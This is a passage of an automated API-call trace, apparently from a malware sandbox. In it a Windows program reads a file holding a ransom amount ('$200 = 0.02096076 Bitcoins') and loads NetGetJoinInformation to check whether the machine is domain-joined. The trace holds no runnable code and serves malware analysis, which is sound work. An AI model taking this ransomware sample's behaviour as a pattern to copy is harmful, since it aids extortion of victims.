(HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512f0 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc41178 [0248.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512f0 | out: hHeap=0xbe0000) returned 1 [0248.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe82c00 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.574] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\0738370262" (normalized: "c:\\progra~2\\common~1\\0738370262"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0248.574] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.574] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4dc | out: lpNewFilePointer=0x0) returned 1 [0248.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xe92c08 [0248.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53350 [0248.575] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.575] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0248.575] ReadFile (in: hFile=0x630, lpBuffer=0xe82c00, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf514, lpOverlapped=0x0 | out: lpBuffer=0xe82c00*, lpNumberOfBytesRead=0x8bf514*=0x1a, lpOverlapped=0x0) returned 1 [0248.576] ReadFile (in: hFile=0x630, lpBuffer=0xe82c00, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf514, lpOverlapped=0x0 | out: lpBuffer=0xe82c00*, lpNumberOfBytesRead=0x8bf514*=0x0, lpOverlapped=0x0) returned 1 [0248.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53350 | out: hHeap=0xbe0000) returned 1 [0248.576] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe92c08 | out: hHeap=0xbe0000) returned 1 [0248.576] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.576] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf510 | out: lpNewFilePointer=0x0) returned 1 [0248.576] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.576] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf510 | out: lpNewFilePointer=0x0) returned 1 [0248.576] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.576] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53350 [0248.576] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.576] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.576] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4f4 | out: lpNewFilePointer=0x0) returned 1 [0248.576] ReadFile (in: hFile=0x630, lpBuffer=0xe82c00, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf51c, lpOverlapped=0x0 | out: lpBuffer=0xe82c00*, lpNumberOfBytesRead=0x8bf51c*=0x1a, lpOverlapped=0x0) returned 1 [0248.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512f0 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.577] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe512f0, cbMultiByte=27, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0248.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x36) returned 0xe33e10 [0248.577] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0xe512f0, cbMultiByte=27, lpWideCharStr=0xe33e10, cchWideChar=27 | out: lpWideCharStr="$200 = 0.02096076 Bitcoins") returned 27 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33e10 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe512f0 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.577] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01658 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01610 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53350 | out: hHeap=0xbe0000) returned 1 [0248.577] CloseHandle (hObject=0x630) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc41178 | out: hHeap=0xbe0000) returned 1 [0248.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526f0 | out: hHeap=0xbe0000) returned 1 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6648 | out: hHeap=0xbe0000) returned 1 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533a0 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d4b8 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.578] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526f0 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d440 [0248.578] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d440 | out: hHeap=0xbe0000) returned 1 [0248.578] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf4008 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01610 [0248.578] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52710 [0248.579] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52710 | out: hHeap=0xbe0000) returned 1 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d440 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52710 [0248.579] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512f0 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d3f0 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53350 [0248.579] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe512b8 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5f8 [0248.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.580] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51280 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7b0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53310 [0248.580] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe51328 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.580] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7d8 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532d0 [0248.580] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d788 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.580] PeekMessageW (in: lpMsg=0x8bf4e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4e4) returned 0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532e0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.580] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.581] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0248.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe016a0 | out: hHeap=0xbe0000) returned 1 [0248.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8c88 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532c0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89b8 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.581] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89b8 | out: hHeap=0xbe0000) returned 1 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89b8 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89a0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.581] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89d0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532b0 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89e8 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0248.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe532a0 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6498 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf64c8 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ac0 [0248.582] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.582] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6738 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c40 [0248.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01730 [0248.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d580 | out: hHeap=0xbe0000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c58 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53290 [0248.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53290 | out: hHeap=0xbe0000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53290 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0248.583] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53270 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53270 | out: hHeap=0xbe0000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d580 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53270 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53260 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53260 | out: hHeap=0xbe0000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53260 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53250 [0248.584] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0248.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53250 | out: hHeap=0xbe0000) returned 1 [0248.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53250 [0248.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0248.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53280 [0248.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0248.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53280 | out: hHeap=0xbe0000) returned 1 [0248.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0248.585] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: hHeap=0xbe0000) returned 1 [0248.585] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74480000 [0248.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8940 [0248.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53240 [0248.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0248.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x16) returned 0xe40af0 [0248.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xe40af0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0248.595] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8940 | out: hHeap=0xbe0000) returned 1 [0248.595] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d558 [0248.595] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.596] GetProcAddress (hModule=0x74480000, lpProcName="NetGetJoinInformation") returned 0x744a2c3f [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d558 | out: hHeap=0xbe0000) returned 1 [0248.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53240 | out: 